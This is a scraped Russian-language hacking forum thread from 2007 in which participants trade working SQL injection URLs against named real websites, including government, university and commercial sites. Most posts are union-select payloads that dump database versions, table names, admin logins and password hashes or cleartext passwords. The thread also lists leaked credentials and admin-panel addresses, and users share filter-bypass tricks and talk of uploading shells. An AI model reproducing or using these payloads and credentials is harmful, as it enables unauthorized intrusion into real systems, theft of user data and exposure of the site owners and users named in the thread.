http://www.logo.artperm.ru/script.php?litera=4'+union+select+1,2,3,4,5,6,7,8+ from+mysql.users+limit+0,1/*
зыж
http://www.7info.ru/index.php?ns=127&id=-61+union+select+1,concat_ws(0x3a,login,password,na me)+from+user/*
b842f0802c987156629ea4c87cca1259:AdmIn7
Из серии : А до талина далекоо?
http://www.siin.ee/bestdesign/?keel=rus&mid=0&include=news_viewer&nid=-1348+union+select+1,2,3,4,5,concat(user(),char(58) ,version()),7,8,9,10,11/*
http://sarv.gi.ee/news.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10/*
KPOT_f!nd
01.05.2007, 04:34
ROLLERCLUB SKATESHOP - AGRESSIVE ONLY
http://rollerclub.ru/agressive/view/fullview.php?id=-474+union+select+1,name,3,concat(0x3a,pass),concat (database(),char(58),version()),6,user(),8,9,10,11 ,12,13+from+users/*
в помощь limit
http://www.filmiveeb.ee/index.php?leht=filmid&id=-3057+UNION+SELECT+1,concat(USER(),char(58),VERSION (),char(58),DATABASE()),3,4,5,6,7,8,9,10,11,12,13, 14,15,16/*
http://eum.nlib.ee/tais.php?sona_id=-1+UNION+SELECT+1,concat(VERSION(),char(58),USER(), char(58),DATABASE()),3,4,5,6,7,8,9,10,11/*
Из серии : А до талина далекоо?
С той же серии ;)
http://aiandus.ee/so_vaata2.php?nid=315+union+select+1,concat(userna me,0x3a,email),3,4+from+users/
http://www.kinnisvarakeskus.ee/show.php?id=-510+union+select+1,convert(concat(version(),0x3a,u ser())+using+latin1),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18/*
http://www.roerich.ee/galnew/show.php?l=est&id=-1902+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13,14,15/*
http://www.einst.ee/links.html?id=-46+union+select+1,2,version(),4,5/*
http://www.samm.ee/info.php?id=-6+union+select+1,version(),3,4,5,6,7,8/*
http://www.ctc.ee/index.php?lang_id=1&menu_id=news.php&news_id=-44+union+select+1,2,3,4,5+from+admin/*8&year=2006
http://www.hiiuauto.ee/news.php?nid=4+union+select+1,2,version(),4/*
http://www.kainakaunid.ee/news.php?nid=17+union+select+1,AES_DECRYPT(AES_ENC RYPT(concat(database(),0x3a,version(),0x3a,user()) ,0x73),0x73),3,4,5/*
http://www.kaina.hiiumaa.ee/news.php?nid=18+union+select+1,version(),3,4,5,6
http://pood.akustika.ee/index.php?GID=-1284+union+select+1,2,3,4,5,6,7,8,9,10,11,AES_DECR YPT(AES_ENCRYPT(concat(user(),0x3a,version()),0x73 ),0x73),13,14,15,16,17,18,19,20,21,22,23,24+from+a dmin&lang=est¤cy=EEK
http://www.nukuteater.ee/news.php?news_id=-19+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat (name,0x3a,password),0x73),0x73),4,5,6+from+users/*
http://www.refland.ee/news.php?vaata=1&id=41+union+select+1,version(),3,4,5,6,7,8,9&lang=est¤cy=EEK
http://www.ignorabimus.ee/news.php?do=show&id=5'+union+select+1,2,version(),4,5/*
http://www.estrobalt.ee/index.php?ct=s&lang=est&sub=5&mn=-8+union+select+version(),2,3,4/*
http://www.kaalud.ee/index.php?GID=-119+union+select+1,2,convert(concat(version(),0x3a ,user())+using+latin1),4,5,6,7,8,9,10,11,12,13,14/*
http://www.meistrite-linn.ee/index.php?GID=-216+union+select+1,2,convert(concat(version(),0x3a ,user())+using+latin1),4,5,6,7,8,9,10,11,12,13,14, 15,16,17/*&lang=est¤cy=EEK
http://www.tnp.ee/ajaleht?news_id=-31+union+select+version(),2,3/*
http://www.ctc.ee/index.php?lang_id=1&menu_id=news.php&news_id=-451+union+select+1,version(),3,4,5/*&year=2006
http://www.bsp.ee/index.php?nid=-26+union+select+1,2,convert(concat(username,0x3a,p assword)+using+latin1),4,5,6,7,8,9+from+users/*&id=9&PHPSESSID=ed87c52615e53f3040e1140f4272e8a3
http://udochki.ru/index.cfm?object=cart&action=add&entry_id=2234%20UNION+SELECT+TOP+10+password,passw ord,password,password,password,password,password,p assword,password,password,password+FROM+USERS
http://www.e-uni.ee/index.php?main=uudis&id=-114+union+select+1,2,3,concat(username,0x3a,passwo rd),5,6,7,8+from+users/*
http://www.linnamuuseum.ee/linnamuuseum/index.php?&id=-2+union+select+1,concat(username,0x3a,user_passwor d),3+from+users+limit+1,2/*
http://www.raikkyla.ee/index.php?id=-257+union+select+1,2,3,4,5,concat(id,0x3a,pass),7, 8,9+from+user/*
http://www.data.ee/uudised.php?ID=-113+union+select+1,version(),3,4/*
http://www.panagia.orthodox.ee/arhiv.php?id=-60+union+select+1,version(),3,4,5,6,7,8/*
http://www.etc.ee/furniture3/index.php?f=companies&id=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18+from+admin/*
я не особо разбираюсь в скулях...
http://www.fasie.ru/index.php?rid=120'+UNION+SELECT+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20/*
лично я ничо не смог достать...=\
я не особо разбираюсь в скулях...
http://www.fasie.ru/index.php?rid=120'+UNION+SELECT+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20/*
лично я ничо не смог достать...=\
Там всего одна колонка :
http://www.fasie.ru/index.php?rid=-120+UNION+SELECT+1/*
Constantine
02.05.2007, 18:31
Очень красивая иньекция на сайте- The University of Texas at Austin
http://www.utexas.edu/studentgov/legislation/version.php?id=-573+union+select+1,2,3,version(),password,6,7,user ,char(58),10+from+users/*
Короче классика, пассы чистые, лимит вам в помощь
Серенький
02.05.2007, 19:45
Мужики - зацените:
www.rudn-kvn.ru одна из моих любимых команд КВН )
уязвимость: http://rudn-kvn.ru/gastroli.shtml?ul=10&uld=78'
кавычку оставляем, смотрим версию - http://rudn-kvn.ru/gastroli.shtml?ul=10&uld=-78'+union+select+1,2,aes_decrypt(aes_encrypt(conca t_ws(0x3a,user(),version(),database()),0x55),0x55) ,4,5/*пятерка! :) смотрим таблицы: http://rudn-kvn.ru/gastroli.shtml?ul=10&uld=-78'+union+select+1,2,aes_decrypt(aes_encrypt(conca t_ws(0x3a,table_name),0x55),0x55),4,5+from+informa tion_schema.tables+limit+20,1/*
интересные таблицы и некоторые поля к ним: banner_users (register,userpass,username,id) ,konkurs_user(tel,city,country,email,name,passwd,u ser_id), sde_register_users(icq,tel,post,name,email,passwd, login,user_id)
Таблиц под 50, есть и интересные.
Есть форум
Есть админкаhttp://rudn-kvn.ru/admin/
ps.отправил багрепорт админу.
вот чуть собралось за пару дней серфа
http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-1+union+select+1,email,3,4,5,6,7,8,9,10,11,12,13,1 4,pass,16,17,18,19,20,21,22,23+from+nuke_users+whe re+uid=2&mode=chrono&order=0
http://www.keckobservatory.org/article.php?id=99
http://anmeldung.iao.fraunhofer.de/veranstaltung.php?id=-1%20union%20select%201,2,3,4,5,6,7,user,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 ,63,64%20from%20mysql.user/*
http://www.updalles.ro/page.php?p=0&s=0&c=16%20and%201=0%20union%20select%20username,2,pas sword,4,5,6,7,8,9%20from%20users
http://www.aeternazentaris.com/en/page.php?p=60&q=46%20and%201=0%20union%20select%201,2,username,p assword%20from%20users
http://www.antiquedealersca.com/memdisplay.php?memID=-1+union+select+1,memid,email,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22+from+members
http://www.affect.ru/portfolio/work.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,61,17,18,19,20,21,22,23,24,25,26+from+mysql.user/*
http://www.wincleaner.com/products/details.php?uid=-1%20union%20select%201,2,3,4,5,6,username,8,9,10,1 1,12,13,14,15,16,17,18,19,20,password,22%20from%20 users%20where%20uid=1
Походу должна быть скуля но не ковырял:
RU-HOST
http://www.ru-host.ru/texts.php?id=1+order+by+2/*
_______________________
http://zywienie.host.sk/articles.php?id=-4+union+select+1,version(),3,4,5,6,7
Solide Snake
02.05.2007, 22:21
www.nukuteater.ee
http://www.nukuteater.ee/news.php?news_id=-1+union+select+1,2,VERSION(),4,5,6/*
http://www.nukuteater.ee/news.php?news_id=-1+union+select+1,2,USER(),4,5,6/*
http://www.nukuteater.ee/news.php?news_id=-1+union+select+1,2,DATABASE(),4,5,6/*
Серенький
02.05.2007, 23:44
Походу должна быть скуля но не ковырял:
RU-HOST
http://www.ru-host.ru/texts.php?id=1+order+by+2/*
http://www.ru-host.ru/texts.php?id=1+and+1=0+union+select+1,concat_ws(0x 3a,user(),version(),database())/*
Серенький
03.05.2007, 00:18
www.nukuteater.ee
Цитата:http://www.nukuteater.ee/news.php?news_id=-1+union+select+1,2,VERSION(),4,5,6/*
http://www.nukuteater.ee/news.php?news_id=-1+union+select+1,2,USER(),4,5,6/*
http://www.nukuteater.ee/news.php?news_id=-1+union+select+1,2,DATABASE(),4,5,6/*
нашел users : username,password,id,name
1:kobin:7678614811d53c5b http://www.nukuteater.ee/news.php?news_id=-246+union+select+1,2,concat_ws(0x3a,id,username,pa ssword,name),4,5,6+from+users+limit+0,1/*
contacts : id,name
news
админка http://www.nukuteater.ee/admin/
nark0109
03.05.2007, 10:28
http://sunrise.ru/contents.asp?reg=30&id='
сарай
stagediver
03.05.2007, 12:29
я не особо разбираюсь в скулях...
http://www.fasie.ru/index.php?rid=120'+UNION+SELECT+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20/*
лично я ничо не смог достать...=\
http://www.fasie.ru/index.php?rid=-100+union+select+1,2,username,4,5+from+phpbb_users +where+user_id=2/*
http://www.tam.ca.gov/view.php?id=-33%20union%20select%201,2,3,4/*
http://www.maineservicecommission.gov/MVF/article.php?ID=202%20union%20select%201,2,3,4,5,6, 7,8,9,10,11,12,13/*
Железо
http://www.legionhardware.com/document.php?id=-11111+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,concat(name,char(58),passwo rd),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54, 55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71 ,72,73,74,75,76,77+from+users/*
Демократия в Америке
http://www.dfalink.com/event.php?id=-11111+UNION+SELECT+1,concat(email,char(58),passwor d),3,4,5,6,7,8,9,10,concat(USER(),char(58),VERSION (),char(58),DATABASE()),12,13,14,15,16,17,18,19,20 ,21,22,23,24+from+members/*
Правда траблы с кодировкой пасса
http://www.ze-linux.org/index.php?id_news=-825+union+select+666/*
mc-laren.ru
http://www.mc-laren.ru/news.php?id=-1+union+select+1,2,concat(login,0x3a,pass),4,5,6,7 ,8,9,10,11,12+from+users/*
а еще там есть форум...
Для НЕлюбителей косметики:
_http://www.wizaz.pl/porady/censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,1 6/**/from/**/users/**/
Админка сайта тут:
_http://www.wizaz.pl/porady/admin.php
70 email'ов)))
kontrudar.ru
http://www.kontrudar.ru/material.php?id=15+and+0=-1+union+select+email,2,3,4,5,null,7,8,9,10,11,12,1 3+from+ic_subscribers+limit+70,1/*
тайтл
пробелы убирать надо
[53x]Shadow
04.05.2007, 11:21
Клуб Выпускников Московского Физико-Технического Института
www.miptclub.ru
http://miptclub.ru/inner/modules/gallery/gallery.php?act=show_gallery&id=-1+union+sel ect+convert(version ()+using+binary)/ *
Admin: amavis
Password(hash):623deab31fd6dd48
Админка: www.miptclub.ru/admin
Уже мона коллекционировать - прошлый раз ассоциация выпускников МГИМО, теперь МФТИ! :D :D
__http://www-illigal.ge.uiuc.edu/system/reports/abstract.php?id=339992+union+select+1,2,3,4,5,6,AE S _DECRYPT(AES_ENCRYPT(version(),0x73),0x73),8,9,10--
Center For Law and Social Policy
http://www.clasp.org/publications.php?id=-1111+UNION+SELECT+1,2,concat(username,char(58),pas sword),4,5,6,7,8,9,10,11,12,13,14,15+from+user/*
Серенький
04.05.2007, 16:38
КВН в НГУ
http://kvn.nsu.ru/discuss.php?po=-021324+union+select+1,2,3,4,concat(name,0x3a,email ,0x3a,passwd),6,7,8,9,0,1,2+from+users/*
Серенький
04.05.2007, 17:24
Футбол. Луч-Энергия (Неофициальный сайт)
Сайт: http://luch-vlad.ru/index.php
уязвимость: http://luch-vlad.ru/index.php?option=com_datsogallery&func=detail&id='
подобранные таблицы: jos_users
подобранные поля: username,password,email,name
1960 организмов
http://luch-vlad.ru/index.php?option=com_datsogallery&func=detail&id='+union+select+1,2,3,4,concat_ws(0x3a,id,userna me,password),6,7,8,9,0,1,2,3,4,5+from+jos_users+li mit+0,1/*admin:8e16abc167627ba17495079c609efa6d (111280)
админка http://luch-vlad.ru/administrator/
форум 2155 организмов
Серенький
04.05.2007, 19:20
Ну, во-первых, не все сайты интересные и посещаемые, уязвимости есть не на всех, а на многих из тех, которые уязвимы, не всегда получается подобрать названия полезных таблиц. И еще реже получается попасть в админку и шелл заюзать.
Плюс бывают интересные особенности, фильтрации и т.п.
Constantine
04.05.2007, 19:25
Dracula4ever сделай хотя бы одну иньекцию на asp
Что касается аспа...
Тут какая-то турецкая муть:
_http://www.banaz.bel.tr/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+adm in
для получения пасса меняем на "sifre"
Админка валяется тут:
http://www.banaz.bel.tr/admin/kontrol.asp
.gov
http://www.maineservicecommission.gov/MVF/article.php?ID=-111+UNION+SELECT+1,2,concat(USER(),char(58),VERSIO N(),char(58),DATABASE()),4,5,6,7,8,9,10,11,12,13/*
Серенький
05.05.2007, 00:28
Футбол.
Сайт: www.liverpoolfc.ru
уязвимость: http://www.liverpoolfc.ru/news.php?id=1673'
подобранные таблицы: users
подобранные поля: user_name,user_pass,user_id
1:Jari:034054de62d75ca7http://www.liverpoolfc.ru/news.php?id=-1673+union+select+1,2,concat_ws(0x3a,user_id,user_ name,user_pass),4,5,6+from+users/* админка http://www.liverpoolfc.ru/_redadmin/
Не окончено:
http://www.juventus.ru/photogallery.php?photo=-1702'+union+select+1,2,3,4,5,6,7,8,9/* - Проблемы с выводом
http://www.attac.de/aktuell/presse/presse_ausgabe.php?id=-1111+UNION+SELECT+1,2,name,4,5,6,7,8,9,10,11,12,13 ,14,15+from+user+limit+2,1/*
.gov
http://www.dswd.gov.ph/ProgProj.php?id=-1111+UNION+SELECT+1,2,concat(user,char(58),passwor d),4,5,6+from+mysql.user/*
MySQL root:zaq12345
KPOT_f!nd
05.05.2007, 07:07
http://poetry.h1.ru/article.php?sid=-526+union+select+1,2,3,4,password,email,7,username ,9,10,11+from+members/*
user:perfilov
password:248192
email:dood@webserver.com
http://outyourbackdoor.com/article.php?id=-684/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22+from+mysql.user/*
Dracula4ever
05.05.2007, 07:46
nero.com
http://www.nero.com/eng/showpress.php?id=-1+union+select+1,2,3/*
stpatsfc.com
http://www.stpatsfc.com/news.php?id=-1+union+select+1,2,3/*
Constantine
05.05.2007, 09:46
Дракула и то и другое жесточайший боян- http://hlamidnik.h18.ru/SQLS.html
www.sdg.ncsa.uiuc.edu
Национальный Центр высокоэффективных вычислительных ресурсов NCSA
http://sdg.ncsa.uiuc.edu/AboutUs/People/contact.php?id=-1+union+select+1,concat(user(),0x203a20,database() ),3,4,5,6,7,8,9,10/*
http://director-online.com/buildArticle.php?id=1089'+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30/*
до 30 дошел и забил... может я слепой =(
http://director-online.com/buildArticle.php?id=1089'+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30/*
до 30 дошел и забил... может я слепой =(
http://director-online.com/buildArticle.php?id=-1111+UNION+SELECT+1,2,3,4,5,6,7,8/*
Пропустил
.gov
http://www.sprk.gov.lv/index.php?id=-1111+UNION+SELECT+1,2,3,4,5,convert(VERSION()+usin g+latin1),7,8,9,10,11,12,13,14,15/*
Какой-то магазин
http://artbridge.ru/show_concurs.php?id=9999999+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,13,14+from+admins&lang=r
Если кто-то узнает пасс от админки прошу стукнуть мне в ацку.Логин админа ABridge;)
http://www.gamesfirst.com/index.php?id=1132'+UNION+SELECT+1,2,3,5,6,7,8,9/*
тут тоже наверное что-то есть...
и тут
http://www.dfalink.com/event.php?id=18354'+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10/*
:confused:
Серенький
05.05.2007, 19:30
a1ex
http://artbridge.ru/show_concurs.php?lang=r&id=9999999+union+select+1,2,3,concat_ws(0x3a,id,lo gin,passw),5,6,7,8,9,10,11,12,13,14+from+admins/*
5:ABridge:9aac48d130bcb88c5f39065b4092a1d1
А вообще - это уже было, смотри http://hlamidnik.h18.ru/SQLS.html
Barney
http://www.gamesfirst.com/*http://director-online.com/
- то же самое.
http://www.reusablebags.com/facts.php?id=4'
попытался, но как всегда что-то упускаю =))
зы
тут есть онлайн шоп, так что может что нить найдете интересного
Серенький
05.05.2007, 19:55
Barney
Проверяй, пожалуйста, прежде чем публиковать - было или нет.
http://hlamidnik.h18.ru/SQLS.html
твоя ссылка там на 4х позициях )
-----cont
www.liverpoolfc.ru
1:Jari:034054de62d75ca7:jokerit
Centre for Social Research on Alcohol and Drugs
http://www.sorad.su.se/projects.php?Id=-1111+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12+from+ admin/*
Что-то там больше ничего нет =)
_______________________________
Фух, хитрые гады, долго пытался шел залить не смог...
Если кто сможет отпишитесь и расскажите
http://www.resejournalen.se/destination.php?Id=-1111+UNION+SELECT+0x6e616d653a70617373776f7264,con cat(username,0x3a,user_password),3,4,5,6,7,8,9,10, 11,12+from+phpbb_users+where+user_id=2/*
Andreas:5bf39735e3e4966a31fa1f58d6a94a1d:Trustno0
Еще 1 таже ситуация
http://www.sko.miun.se/page.php?kategori=35&underkategori=-1111+UNION+SELECT+1,concat_ws(0x3a,username,user_p assword),3,4,5,6,7+from+phpbb_users/*
admin:ba952731f97fb058035aa399b1cb3d5c:karen
там 2 форума, 1 основной, 2 левый (http://www.sko.miun.se/phpBB2/) это пасс от левого, т.к. префикс главного не угадал! =)
__________________
Веб админы блин
http://webxadmin.free.fr/article.php?i=-1111+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12/*
Филлипинский парламент
http://www.congress.gov.ph/press/details.php?pressid=-1+union+select+1,concat(user(),0x81,version(),0x81 ,database()),3,4,5,6,7,8--
Joker-jar
06.05.2007, 18:12
Очень интересно, смотрите сами:
http://www.188888.ru/download.php?file_id=-1+union+select+1/*
http://www.188888.ru/download.php?file_id=-1+union+select+1,2/*
Ну а тут все понятно
http://www.box-cd.com/p_magazin.php?tip=1+union+select+1,version()/*
Серенький
06.05.2007, 18:29
Незавершенное:
Сайт: http://www.password.ru/ (Каталог cайтов c красивым названием)
http://password.ru/sites.php?cat=16+and+1=0+union+select+1,2,3,concat _ws(user(),version(),database())/* http://password.ru/admin/admin.php
Сайт: http://www.fc-arsenal.com/ (ARSSC: Официальный фан-клуб "Арсенала" в России)
http://www.fc-arsenal.com/index.php?page=news&id=-1289+union+select+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5,6,7,8/* http://www.fc-arsenal.com/admin
Сайт: http://www.fcalania.ru/ (АЛАНСКИЕ БАРСЫ. Сайт болельщиков ФК АЛАНИЯ)
http://www.fcalania.ru/press/publication.php?id=-1930'+union+select+1,2,3,4,5,6,concat_ws(0x3a,user (),version(),database())/*
Готовое
----------------------------------------------------------------- вопросик
Сайт: http://www.shinnik.yar.ru/ (Официальный сайт ФК Шинник)
поглядим на версию и улыбнемся, так как она пятая)http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,version(),3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1/* смотрим таблицы через системную бд information_schema http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,table_name,3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1+from+information_schema.tables+ limit+125,1/* и видим там таблицу nuke_users Но кавычки скринятся и не удается посмотреть названия полей в таблице -
http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,column_name,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1+from+information_schema.column s+where+table_name='nuke_users'+limit+0,1/*
не проходит,
так вот вопрос - как это обойти, как изменить запрос, чтоб увидеть названия полей?
*админка недалеко, вперед и направо - http://www.shinnik.yar.ru/admin.php
upd. Скачал PostNuke, на котором построен сайт, посмотрел названия полей они все с префиксом pn_ так что
искомые поля - pn_uid,pn_uname,pn_pass,pn_emailhttp://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,concat_ws(0x3a,pn_uid,pn_uname ,pn_pass,pn_email),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1+from+nuke_users+limit+1,1/* 2:admin:ff9830c42660c1dd1942844f8069b74a
Пароль админа очень многозначительный - root123
Вот, но вопрос в силе.
http://www.eurohs.eu.com/front-end/news-full.php?id=-1'
http://www.neurope.eu/view_news.php?id=71989'
(либо я пропустил, либо столбцов больше 20...)
Серенький
06.05.2007, 19:43
Barney
используй order by
http://www.neurope.eu/view_news.php?id=71989 order by 73/* и ранее ошибки нет
http://www.neurope.eu/view_news.php?id=71989 order by 74/* - ошибка, и, значит, полей 73.http://www.neurope.eu/view_news.php?id=-71989+union+select+1,concat_ws(0x3a,user(),version (),database()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 ,1,2,3/*http://www.eurohs.eu.com/front-end/news-full.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),v ersion(),database()),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 ,3,4/*
нашел users(username,password,user_id)
http://www.eurohs.eu.com/front-end/news-full.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_id, username,password),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 ,4+from+users/*
Компания Берлин Хеми
http://www.berlin-chemie.de/unt/news_detail.html?id=-286%20union+select+1,2,3,user(),5,6,7,8,9,10,11,12 ,13,14,15,16,17/*
http://www.berlin-chemie.de/unt/news_detail.html?id=-286%20union+select+1,2,Username,password,5,6,7,8,9 ,10,11,12,13,14,15,16,17+from+users+limit+0,1/*
http://www.berlin-chemie.de/admin
главный
login:administrator pass:jnkg2ew
отдельных разделов
inter la8z7eo
adm kjuhw2xy
jobs tw8fqx2
news x0el7ut
Constantine
06.05.2007, 22:15
\\\от меня скуль\\\
http://www.technischerhandel.de/haendler/single.php?id=-1160+union+select+1,2,version(),4,database(),6,7,8 ,9,10,11,12,13,14,15,16+from+mysql.user/*
flydortmund.com
http://www.flydortmund.com/daten/in0_4.php?ALL_ID=-2+union+select+1,concat(user(),CHAR(58),VERSION()) ,3,4,5/*
www.nieuwsshow.nl
http://www.nieuwsshow.nl/PHP/all.php?all_ID=-1+UNION+SELECT+1,concat(user(),CHAR(58),VERSION()) ,3,4,5,6/*
EvoWeb
http://evonet.lri.fr/evoweb/news_events/news_features/article.php?id=-1111+UNION+SELECT+1,2,3,concat_ws(0x3a,user_name,u ser_password,user_email),5,6,7,8,9,10,11,12+from+u ser+limit+0,1/*
лимитом крутить можно
_______________________
The Lesbian & Gay Foundation
http://www.lgf.org.uk/lgf_category.php?ID=-1111+UNION+SELECT+1,concat_ws(0x3a,username,passwo rd),3,4+from+users/*
admin:orangecat172006
KPOT_f!nd
07.05.2007, 00:35
www.maineservicecommission.gov
http://www.maineservicecommission.gov/news/release.php?ID=-252+union+select+1,2,user(),version(),database(),6 ,7,8,9,10,11,12/*
таблицы: admin, news, user
админ панель: www.maineservicecommission.gov/hub/login.php
www.psat.wa.gov
http://www.psat.wa.gov/Publications/news_stories/hoodcanal_news_story.php?id=-131+union+select+1,2,3,4,convert(concat(user(),cha r(58),version(),char(58),database())+using+latin1) ,6,7,8+user/*
www.cherp.research.med.va.gov
http://www.cherp.research.med.va.gov/pr_read.php?id=-75+union+select+user(),2,version(),4,database(),6/*
таблицы: tbl_personnel, tbl_press_releases
www.y12.doe.gov
http://www.y12.doe.gov/news/release.php?id=-38+union+select+1,password,3,4,database(),6,versio n(),user(),user,10+from+mysql.user/*
www.serti.ru
http://www.serti.ru/pages.php?id=-2768+union+select+1,2,concat(user,0x3a,pass)+from+ admin/*
dexm:dexmmm
http://una.ge/eng/artdetail.php?group=articles&id=102%20UNION%20SELECT%201,2,concat(loginname,0x3 a,password),4,5,6,7,8,9%20from%20phplist_admin%20l imit%201,1/*
или так
http://una.ge/eng/artdetail.php?group=articles&id=102%20UNION%20SELECT%201,2,concat(name,0x3a,pas swd),4,5,6,7,8,9%20from%20user%20limit%201,1/*
вот еще
http://rustavi2.com/news/news_text.php?id_news=20582%20UNION%20SELECT%201,2 ,3,4,5,usrname,pass,8,9,10,11,12%20from%20users_p% 20limit%201,1/*
parametrix.ru
http://www.parametrix.ru/index.asp?idSort=1+or+1=(SELECT+TOP+1+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT +IN+('admin','clients','clients_id','Content','Dom ainPrices','Domains','dtproperties','forum_data',' forum_mails','forum_theme','forum_title','help','h osting','idClient','Links','Log','Mailer','Menu',' Meta','MetaLinks','News','paystat','paystat1','pot _clients','pot_kinds','property','support','SupTop icAnswers','SupTopics','sysconstraints','syssegmen ts','ue'))--&idPage=1
natalie:parametr:parametrix.ru
roma:roma:parametrix.ru
parametrix:5086164
www.mc.uky.edu
http://www.mc.uky.edu/pharmacy/news_archive.asp?id=1'+or+1=(SELECT+TOP+1+TABLE_NA ME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME +NOT+IN+('CR_COURSE_INFO','AspNet_SqlCacheTablesFo rChangeNotification','BUILDING','CONTENT','CPST_Ad min','CPST_Clients','CPST_Employees','CPST_OF','CP ST_Projects','CR_COURSE_REVIEW','CR_FAC_INFO','DIV ISION','dtproperties','EMAILS','FAC_ADVISING','FAC _ADVISING_ROLE','FAC_ADVISING_STUDENT_TYPE','FAC_C ERTIFICATION','FAC_CONSULTING','FAC_EDADVISE','FAC _EDUCATION','FAC_EXPERIENCE'))--
http://www.mc.uky.edu/pharmacy/news_archive.asp?id=1'+or+1=(SELECT+TOP+1+cast(ID+ as+nvarchar)%2B%27%3A%27%2Bcast(username+as+nvarch ar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+ CPST_Admin+WHERE+ID=1)--
1:tasize0:test1
2:bloft2:cpst1admin
админки не нашел \=
ЛифчиС5СВ
07.05.2007, 13:42
Любимый туристический портал о Чехии
http://www.ilovecz.ru/index.php?idofpage=-1+union+select+1,user(),version()/*
http://valakas.perm.ru/index2.php?c=14
в mssql полный ноль : )
http://valakas.perm.ru/index2.php?c=13
http://valakas.perm.ru/index2.php?c=14-1
где ты здесь инъекцию нашел? \=
www.krasota.ru
- здесь ошиваются такие люди как сергей зверев и прочие гандурасы \=
http://www.krasota.ru/forum/print.phtm?fident=9&ident=-1+union+select+aes_decrypt(aes_encrypt(version(),0 x71),0x71)/*
таблиц не было времени подбирать \=
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near ')'. (severity 15) in D:\www_la2\show_clan_info.php on line 53
Warning: mssql_query() [function.mssql-query]: Query failed in D:\www_la2\show_clan_info.php on line 53
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource in D:\www_la2\show_clan_info.php on line 55
Fatal error: Cannot redeclare antiinjection() (previously declared in D:\www_la2\includes\functions.php:9) in D:\www_la2\base\index.php on line 171
разве это не показатель возможности проведения скуль инжекта?
или я что-то путаю?
в данном случае не показатель.
Incorrect syntax near ')'. (severity 15) in D:\www_la2\show_clan_info.php on line 53
ошибка в запросе, находящемся в самом скрипте, а не определяемым строкой адреса.
так вот вопрос - как это обойти, как изменить запрос, чтоб увидеть названия полей?
Использовать char:
nuke_users=char(110,117,107,101,95,117,115,101,114 ,115)
В твоем случае - http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,column_name,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1+from+information_schema.column s+where+table_name=char(110,117,107,101,95,117,115 ,101,114,115)+limit+0,1/*
http://www.chasm.ru/profile.php?userid=1153%20union%20select%201,passw ord,3,4,5,6,7,8,9,0,11,12,13,14,email,login,17,18, 19,20,21,22%20from%20users/*
http://dbusinessnews.com/shownews.php?newsid=-1+and+1+union+select+concat(email,0x3a,password),2 ,3,4,5,6,7+from+users+limit+1,1/*&type_news=latest
Пассы в открытом виде. Лимитом можно погонять.
www.webchats.tv
http://www.webchats.tv/webchat.php?ID=-1111+UNION+SELECT+1,2,3,4,5,6,7,8,table_name,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53+from+information_schema .tables+limit+20,1/*
Серенький
07.05.2007, 21:31
Кафедра КВН
